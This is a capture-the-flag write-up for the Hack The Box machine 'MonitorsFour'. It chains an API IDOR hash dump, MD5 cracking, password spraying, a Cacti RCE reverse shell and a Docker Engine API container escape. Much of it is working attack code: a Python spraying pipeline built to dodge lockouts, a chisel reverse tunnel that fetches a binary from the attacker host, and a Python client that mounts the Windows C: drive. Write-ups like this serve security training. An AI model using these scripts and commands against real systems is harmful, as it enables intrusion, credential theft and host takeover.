Hack The Box - Season 9 HTB MonitorsFour Writeup - Easy - Weekly - December 6th, 2025
HackTheBox: MonitorsFour - Full Writeup
Box Information
| Property | Value |
|---|---|
| Name | MonitorsFour |
| OS | Windows (with Docker) |
| Difficulty | Easy |
| Key Techniques | API IDOR, Credential Spraying, Cacti RCE, Docker Escape |
Executive Summary
MonitorsFour is a Windows machine running a web application whose /user API endpoint leaks the entire user table, password hashes included, through an Insecure Direct Object Reference (IDOR). After cracking the unsalted MD5 hashes and spraying the recovered password against usernames derived from the leaked full names, we log in to a Cacti network monitoring instance on a subdomain. Exploiting CVE-2025-24367 in Cacti 1.2.28 gives a reverse shell inside a Linux Docker container. From there the container can reach Docker Desktop's internal Docker Engine API on the Windows host without any authentication (CVE-2025-9074); creating a container that bind-mounts the host's C: drive yields full system compromise.
Reconnaissance
Initial Port Scan
nmap -sC -sV -oA nmap/monitorsfour 10.10.11.xxx
The scan shows a web server on the target; everything that follows goes over HTTP. Add the hostname to /etc/hosts:
echo "10.10.11.xxx monitorsfour.htb" | sudo tee -a /etc/hosts
Web Directory Enumeration
Using ffuf for directory brute-forcing with a medium-sized wordlist:
ffuf -t 400 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt \
-u http://monitorsfour.htb/FUZZ -ac
Key Finding: /user endpoint discovered, returning JSON data.
Subdomain Enumeration
Virtual host enumeration to discover additional attack surface:
ffuf -t 400 -w /usr/share/seclists/Discovery/DNS/combined_subdomains.txt \
-u http://monitorsfour.htb \
-H "Host: FUZZ.monitorsfour.htb" -ac
Key Finding: cacti.monitorsfour.htb subdomain discovered.
Add to hosts file:
echo "10.10.11.xxx cacti.monitorsfour.htb" | sudo tee -a /etc/hosts
Vulnerability Assessment
API IDOR Vulnerability
The /user endpoint accepts a token parameter that appears to be a sequential user ID. Testing with token=0 returns all users in the database:
curl -s "http://monitorsfour.htb/user?token=0" | jq
Leaked Credentials:
| Username | MD5 Hash | Full Name |
|---|---|---|
| admin | 56b32eb43e6f15395f6c46c1c9e1cd36 | (Admin) |
| mwatson | 69196959c16b26ef00b77d82cf6eb169 | Marcus Watson |
| janderson | 2a22dcf99190c322d974c8df5ba3256b | J. Anderson |
| dthompson | 8d4a7e7fd08555133e056d9aacb1e519 | D. Thompson |
Vulnerability Details:
- Type: Insecure Direct Object Reference (IDOR)
- Impact: Complete user database enumeration including password hashes
- Root Cause: the client-supplied token is treated as the only access control; there is no session-based authorization check, and a value of 0 disables the per-user filter, so every record is returned, password hashes included
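To make the root cause concrete, here is a constructed Python model of the endpoint next to a hardened version. This is added illustration, not the application's real code: the in-memory table, the field names and the assumption that "token == 0 means no filter" are all mine, and the digests are computed from toy passwords rather than taken from the box.

```python
import hashlib
from typing import Dict, List, Optional

# Constructed in-memory user table standing in for the app's database. The
# digests are computed here from toy passwords; only the usernames and display
# names mirror the /user dump in the writeup.
USERS: List[Dict] = [
    {"id": 1, "username": "admin",     "name": "Admin",         "password": hashlib.md5(b"toy-admin").hexdigest()},
    {"id": 2, "username": "mwatson",   "name": "Marcus Watson", "password": hashlib.md5(b"toy-marcus").hexdigest()},
    {"id": 3, "username": "janderson", "name": "J. Anderson",   "password": hashlib.md5(b"toy-anderson").hexdigest()},
    {"id": 4, "username": "dthompson", "name": "D. Thompson",   "password": hashlib.md5(b"toy-thompson").hexdigest()},
]


def vulnerable_user_endpoint(token: int) -> List[Dict]:
    """Shape of the bug described above (assumed, not the app's real code):
    the client-supplied token is the only filter, 0 switches the filter off,
    and the rows are returned verbatim, password hashes included."""
    if token == 0:
        return list(USERS)
    return [u for u in USERS if u["id"] == token]


def hardened_user_endpoint(session_user_id: Optional[int], token: int) -> Dict:
    """Fix: authorization comes from the server-side session, not the request
    parameter; the parameter may only name the caller's own record (or any
    record for admin); and the response is a projection that never carries
    credential material."""
    if session_user_id is None:
        raise PermissionError("401: login required")
    caller = next((u for u in USERS if u["id"] == session_user_id), None)
    if caller is None:
        raise PermissionError("401: unknown session")
    if token != session_user_id and caller["username"] != "admin":
        raise PermissionError("403: not your record")
    target = next((u for u in USERS if u["id"] == token), None)
    if target is None:
        raise LookupError("404: no such user")
    return {k: target[k] for k in ("id", "username", "name")}   # hash is never serialised


if __name__ == "__main__":
    print(len(vulnerable_user_endpoint(0)), "rows leaked by token=0")
    print(hardened_user_endpoint(2, 2))
```

The two changes that matter are that the identity used for the check comes from the session rather than from the URL, and that the serialiser whitelists fields, so even an authorization slip would not hand out hashes.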
Exploitation
Phase 1: Password Cracking
The leaked hashes are unsalted MD5, so a single wordlist pass cracks every user's hash at once:
# Hash file: one hash per line, all four from the /user dump
cat > hashes.txt <<'EOF'
56b32eb43e6f15395f6c46c1c9e1cd36
69196959c16b26ef00b77d82cf6eb169
2a22dcf99190c322d974c8df5ba3256b
8d4a7e7fd08555133e056d9aacb1e519
EOF
# Crack with hashcat (-m 0 = raw MD5)
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
# Print hash:password pairs from the potfile
hashcat -m 0 hashes.txt --show
Cracked Password: wonderful1
Alternative using John the Ripper:
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --format=raw-md5 --show hashes.txt
Phase 2: Credential Spraying & Web Application Access
With the password wonderful1 and the usernames and full names returned by the API (for example "Marcus Watson" for mwatson), we build a short list of candidate usernames (marcus, mwatson, marcus.watson, ...) and spray the single password across them on each login form.
Main Application Login:
Navigate to http://monitorsfour.htb/login and test credentials:
- Valid Credentials:
marcus:wonderful1
The username marcus was derived from the full name "Marcus Watson" (mwatson) returned by the API.
After logging into the main application, we gain access to an admin panel. Navigating to http://monitorsfour.htb/admin/changelog reveals important information about the infrastructure, including Docker version details and recent updates. This information becomes critical later for the privilege escalation phase.
Cacti Subdomain Access:
Using the same credentials against http://cacti.monitorsfour.htb/cacti/:
- Valid Credentials:
marcus:wonderful1
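The cracking and spraying steps of Phase 1 and Phase 2 as one offline Python pipeline. This is an added example, not tooling from the writeup: the JSON layout is an assumption about the real /user response, the digests are computed from a toy wordlist rather than copied from the box, and the login probe is injected as a callable so the logic runs without a target (in the engagement it would POST to /login and to the Cacti login form).

```python
import hashlib
import json
import re
import time
from typing import Callable, Dict, Iterable, List, Set, Tuple

# Constructed stand-in for the /user?token=0 response. The field names are an
# assumption about the real API, and the digests are computed here from a toy
# wordlist rather than copied from the box.
LEAKED_JSON = json.dumps([
    {"username": "admin",     "name": "Admin",         "password": hashlib.md5(b"letmein").hexdigest()},
    {"username": "mwatson",   "name": "Marcus Watson", "password": hashlib.md5(b"wonderful1").hexdigest()},
    {"username": "janderson", "name": "J. Anderson",   "password": hashlib.md5(b"Summer2025!").hexdigest()},
])

# Toy wordlist standing in for rockyou.txt (constructed; "Summer2025!" is
# deliberately absent so one hash stays uncracked).
WORDLIST = ["password", "letmein", "wonderful1", "monitor", "cacti"]


def crack_md5(hashes: Iterable[str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Unsalted MD5: one pass over the wordlist cracks every hash at once, because
    the same password yields the same digest for every user. Returns digest -> word."""
    targets = {h.lower() for h in hashes}
    found: Dict[str, str] = {}
    for word in wordlist:
        digest = hashlib.md5(word.encode()).hexdigest()
        if digest in targets and digest not in found:
            found[digest] = word
            if len(found) == len(targets):
                break
    return found


def derive_usernames(username: str, full_name: str) -> Set[str]:
    """Candidate logins from an API username plus its display name, e.g.
    ("mwatson", "Marcus Watson") -> marcus, watson, marcus.watson, watsonm, ...
    Names given only as an initial ("J. Anderson") add nothing beyond the username."""
    parts = [p for p in re.split(r"[\s.]+", full_name.lower()) if p]
    candidates = {username.lower()}
    if len(parts) >= 2 and len(parts[0]) > 1:
        first, last = parts[0], parts[-1]
        candidates |= {first, last, f"{first}.{last}", f"{first}{last}",
                       f"{first}_{last}", f"{first[0]}{last}", f"{last}{first[0]}"}
    return candidates


def spray(usernames: List[str], passwords: List[str],
          try_login: Callable[[str, str], bool], delay: float = 0.0) -> List[Tuple[str, str]]:
    """Password spraying: the outer loop is the password, so every account sees one
    attempt per round and stays under typical lockout thresholds. try_login is the
    service-specific probe (a POST to /login, or to Cacti's login form) and is
    injected so the logic can be exercised offline."""
    hits: List[Tuple[str, str]] = []
    for password in passwords:
        for user in usernames:
            if try_login(user, password):
                hits.append((user, password))
            if delay:
                time.sleep(delay)
    return hits


def run_credential_attack(leaked_json: str, wordlist: Iterable[str],
                          try_login: Callable[[str, str], bool],
                          delay: float = 0.0) -> List[Tuple[str, str]]:
    """Crack the dump, expand every account into candidate usernames, then spray
    each recovered password across all of them (password reuse across accounts)."""
    users = json.loads(leaked_json)
    cracked = crack_md5((u["password"] for u in users), wordlist)
    usernames: Set[str] = set()
    for u in users:
        usernames |= derive_usernames(u["username"], u["name"])
    return spray(sorted(usernames), sorted(set(cracked.values())), try_login, delay)


if __name__ == "__main__":
    # Offline demonstration with a fake login oracle (constructed): only these
    # two pairs are "valid". In the engagement try_login would submit the form.
    valid = {("marcus", "wonderful1"), ("admin", "letmein")}
    print(run_credential_attack(LEAKED_JSON, WORDLIST, lambda u, p: (u, p) in valid))
```

The password-outer loop is deliberate: trying one password against every user per round keeps each account under typical lockout thresholds, and the optional delay throttles the overall rate against both the main application and Cacti.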
Phase 3: Cacti Version Identification
After logging in, the Cacti dashboard reveals version information:
- Version: Cacti 1.2.28
- CVE: CVE-2025-24367 - Authenticated Remote Code Execution
Vulnerability Background:
CVE-2025-24367 is an authenticated remote code execution vulnerability in Cacti versions prior to 1.2.29. An authenticated user can abuse the graph creation and graph template functionality to write an arbitrary PHP script into the application's web root, which is then executed by requesting it over HTTP.
Phase 4: Cacti RCE Exploitation
Clone and execute the public exploit:
# Clone the exploit repository
git clone https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC
cd CVE-2025-24367-Cacti-PoC
# Set up listener in another terminal
nc -lvnp 4444
# Execute exploit
python3 exploit.py \
-u marcus \
-p wonderful1 \
-i <YOUR_IP> \
-l 4444 \
--url http://cacti.monitorsfour.htb
Result: Reverse shell as www-data
Phase 5: Container Identification
Immediately upon landing, identify the environment:
# Check for Docker indicators
ls -la /.dockerenv
# File exists = we're in a container
# Additional confirmation (on cgroup v2 hosts /proc/1/cgroup may only show "0::/", so do not rely on it alone)
grep -i docker /proc/1/cgroup
hostname
cat /etc/os-release
Conclusion: We're inside a Docker container, not the host system.
User Flag
The user flag is accessible from within the container:
cat /home/marcus/user.txt
Privilege Escalation: Docker Escape
Leveraging the Changelog Hint
Recall from earlier that http://monitorsfour.htb/admin/changelog revealed Docker version and configuration details. This information indicated that Docker Desktop was in use with potentially insecure API settings, pointing us toward investigating Docker API exposure as an escape vector.
Internal Network Reconnaissance
Enumerate the container's network to identify escape vectors:
# Check network interfaces
ip addr
cat /etc/hosts
# Scan for the Docker API (plaintext 2375, TLS 2376) without relying on nmap in the
# container: bash's /dev/tcp pseudo-device makes the TCP connect for us.
# 192.168.65.7 is the address of Docker Desktop's internal engine endpoint named in
# the CVE-2025-9074 advisory.
for port in 2375 2376; do
timeout 1 bash -c "echo >/dev/tcp/192.168.65.7/$port" 2>/dev/null && echo "Port $port open"
done
Discovery: Docker API exposed on 192.168.65.7:2375 (unencrypted and unauthenticated)
Verify Docker API Access
curl -s http://192.168.65.7:2375/version | jq
Sample response confirming API access:
{
"Version": "24.0.x",
"ApiVersion": "1.43",
"Os": "linux",
"Arch": "amd64"
}
Method 1: Chisel Tunnel + Local Exploitation
For more reliable exploitation, tunnel the Docker API to your attacking machine.
On Attacking Machine:
# Start chisel server
./chisel server -p 8000 --reverse
# Also start a web server to transfer chisel
python3 -m http.server 8081
In Docker Container:
# Download chisel
curl http://<YOUR_IP>:8081/chisel -o /tmp/chisel
chmod +x /tmp/chisel
# Establish reverse tunnel
/tmp/chisel client <YOUR_IP>:8000 R:2375:192.168.65.7:2375
Now the Docker API is accessible on your local machine at localhost:2375.
Exploit CVE-2025-9074:
# Clone exploit
git clone https://github.com/j3r1ch0123/CVE-2025-9074
cd CVE-2025-9074
# Read root flag
python3 exploit.py \
-u http://localhost:2375 \
-c 'cat /host_root/Users/Administrator/Desktop/root.txt'
# Note on shells: the command runs inside the Linux helper container that the exploit
# creates (compare Method 2 below), so a Windows payload such as "powershell -e ..." will
# not execute there. Host-level impact comes from the read/write access to C:\ that the
# /host_root mount provides, not from invoking Windows binaries from the container.
Method 2: Direct Exploitation from Container
If you prefer to exploit directly without tunneling:
# Create a container with the host filesystem mounted. The image must already exist on
# the engine (check GET /images/json): an engine without internet access cannot pull
# alpine, so substitute a local tag if needed.
CID=$(curl -s -X POST \
-H "Content-Type: application/json" \
http://192.168.65.7:2375/containers/create \
-d '{
"Image": "alpine",
"Cmd": ["cat", "/host_root/Users/Administrator/Desktop/root.txt"],
"HostConfig": {
"Binds": ["/mnt/host/c:/host_root"]
}
}' | grep -o '"Id":"[^"]*' | cut -d'"' -f4)
echo "Container ID: $CID"
# Start the container, then wait for it to exit so the logs are complete
curl -s -X POST http://192.168.65.7:2375/containers/$CID/start
curl -s -X POST http://192.168.65.7:2375/containers/$CID/wait
# Retrieve output (root flag). Non-TTY logs come back as a multiplexed stream with an
# 8-byte frame header before each chunk; --output - makes curl print that binary to the terminal.
curl -s --output - "http://192.168.65.7:2375/containers/$CID/logs?stdout=true&stderr=true"
# Cleanup
curl -s -X DELETE http://192.168.65.7:2375/containers/$CID?force=true
Understanding the Mount Path:
In Docker Desktop for Windows, the host filesystem is accessible within containers via a special mount:
- /mnt/host/c maps to the Windows C:\ drive
- When we bind /mnt/host/c:/host_root, we are mounting C:\ to /host_root in our malicious container
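The same Method 2 sequence as a small Python client for the Engine API, added here as a worked example (it is not the exploit repository's code). It assumes the address, port and API version the writeup reports, picks an image that already exists on the engine instead of assuming alpine, waits for the container to exit before reading logs, and decodes the multiplexed log framing that curl shows as stray bytes. Only the pure helpers (spec builder, image picker, stream decoder) run offline; the HTTP calls need the real endpoint or the chisel tunnel.

```python
import http.client
import json
import struct
from typing import Dict, List, Optional, Tuple

# Docker Desktop's internal engine endpoint as seen from the Cacti container
# (address and port from the writeup; point them at localhost when tunnelling
# via chisel as in Method 1).
DOCKER_HOST = "192.168.65.7"
DOCKER_PORT = 2375
API_PREFIX = "/v1.43"   # ApiVersion reported by GET /version above


def docker_request(method: str, path: str, body: Optional[dict] = None,
                   host: str = DOCKER_HOST, port: int = DOCKER_PORT) -> Tuple[int, bytes]:
    """One JSON-over-HTTP call to the engine; returns (HTTP status, raw body).
    No TLS and no credentials are involved, which is the whole problem."""
    conn = http.client.HTTPConnection(host, port, timeout=15)
    payload = json.dumps(body) if body is not None else None
    headers = {"Content-Type": "application/json"} if payload is not None else {}
    conn.request(method, API_PREFIX + path, body=payload, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, data


def pick_local_image(images_json: bytes,
                     preferred: Tuple[str, ...] = ("alpine", "busybox", "debian", "ubuntu")) -> Optional[str]:
    """Pick an image that already exists on the engine (GET /images/json). An
    engine without internet access cannot pull alpine, so never assume it is there."""
    tags = [t for img in json.loads(images_json)
            for t in (img.get("RepoTags") or []) if t != "<none>:<none>"]
    for want in preferred:
        for tag in tags:
            if tag.rsplit(":", 1)[0].split("/")[-1] == want:
                return tag
    return tags[0] if tags else None


def build_container_spec(image: str, cmd: List[str],
                         host_dir: str = "/mnt/host/c", mount_at: str = "/host_root") -> dict:
    """Container definition that binds the Windows C: drive, which the Docker
    Desktop VM exposes as /mnt/host/c, into the new container at /host_root."""
    return {"Image": image, "Cmd": cmd, "HostConfig": {"Binds": [f"{host_dir}:{mount_at}"]}}


def decode_log_stream(raw: bytes) -> Dict[str, bytes]:
    """Demultiplex /containers/{id}/logs output for a non-TTY container: each
    frame is an 8-byte header (stream type 1=stdout 2=stderr, three zero bytes,
    big-endian uint32 length) followed by that many payload bytes."""
    out = {"stdout": b"", "stderr": b""}
    pos = 0
    while pos + 8 <= len(raw):
        stream_type, length = struct.unpack(">B3xI", raw[pos:pos + 8])
        pos += 8
        out["stderr" if stream_type == 2 else "stdout"] += raw[pos:pos + length]
        pos += length
    return out


def read_host_file(path_under_c: str, image: Optional[str] = None) -> bytes:
    """Create a container with C:\\ mounted, cat one file, wait for exit,
    collect stdout and remove the container again."""
    if image is None:
        _, data = docker_request("GET", "/images/json")
        image = pick_local_image(data)
        if image is None:
            raise RuntimeError("no local images on the engine and pulling is not an option offline")
    spec = build_container_spec(image, ["cat", "/host_root/" + path_under_c.lstrip("/")])
    status, data = docker_request("POST", "/containers/create", spec)
    if status != 201:
        raise RuntimeError(f"create failed: {status} {data!r}")
    cid = json.loads(data)["Id"]
    try:
        docker_request("POST", f"/containers/{cid}/start")
        docker_request("POST", f"/containers/{cid}/wait")      # block until cat exits
        _, logs = docker_request("GET", f"/containers/{cid}/logs?stdout=true&stderr=true")
        return decode_log_stream(logs)["stdout"]
    finally:
        docker_request("DELETE", f"/containers/{cid}?force=true")


if __name__ == "__main__":
    print(read_host_file("Users/Administrator/Desktop/root.txt").decode(errors="replace"))
```

The try/finally removes the helper container even when the read fails, which matters on a shared lab box; the same structure works for writing into C:\ by swapping the cat command for a shell that redirects into /host_root.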
Attack Chain Summary
┌─────────────────────────────────────────────────────────────────┐
│ ATTACK CHAIN VISUALIZATION │
└─────────────────────────────────────────────────────────────────┘
[1] RECONNAISSANCE
│
├── Directory Fuzzing ──► /user endpoint discovered
│
└── Subdomain Enum ──► cacti.monitorsfour.htb
[2] API EXPLOITATION (IDOR)
│
└── /user?token=0 ──► User database dump (MD5 hashes)
[3] CREDENTIAL ATTACK
│
├── Hashcat (MD5) ──► wonderful1
│
└── Credential Spray ──► marcus:wonderful1
[4] WEB APPLICATION ACCESS
│
├── /login ──► Main app access as marcus
│
├── /admin/changelog ──► Docker version info (hint for escape)
│
└── Cacti login ──► marcus:wonderful1
[5] INITIAL ACCESS
│
└── CVE-2025-24367 ──► RCE as www-data (Docker container)
[6] DOCKER ESCAPE
│
├── Changelog Hint ──► Docker Desktop configuration exposed
│
├── Network Recon ──► Docker API @ 192.168.65.7:2375
│
└── CVE-2025-9074 ──► Privileged container with host mount
[7] SYSTEM COMPROMISE
│
└── /mnt/host/c mount ──► Full Windows filesystem access
└── Administrator/root.txt
Vulnerabilities Summary
| # | Vulnerability | CVE | Severity | Impact |
|---|---|---|---|---|
| 1 | API IDOR | N/A | High | User credential disclosure |
| 2 | Weak Password Hashing | N/A | Medium | MD5 without salt enables cracking |
| 3 | Password Reuse | N/A | Medium | Cross-service credential validity |
| 4 | Cacti RCE | CVE-2025-24367 | Critical | Authenticated code execution |
| 5 | Docker Engine API reachable from containers | CVE-2025-9074 | Critical | Container escape, host compromise |
Remediation Recommendations
- API Security
- Implement proper authorization checks on all API endpoints
- Never expose sequential/guessable identifiers
- Rate limit API requests
- Password Security
- Use bcrypt, scrypt, or Argon2 instead of MD5
- Enforce strong password policies
- Implement account lockout after failed attempts
- Cacti Hardening
- Update to Cacti 1.2.29 or later
- Implement network segmentation
- Regular security patching schedule
- Docker Security
- Update Docker Desktop to 4.44.3 or later, the release that fixes CVE-2025-9074, so containers can no longer reach the engine API
- Never expose the Docker API without TLS and client-certificate authentication
- Use Docker socket proxies with authorization
- Implement network policies for container isolation
- Regular container image scanning
Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port scanning |
| ffuf | Directory and subdomain enumeration |
| curl | API interaction |
| jq | JSON parsing |
| hashcat | Password cracking |
| chisel | TCP tunneling |
| netcat | Reverse shell handler |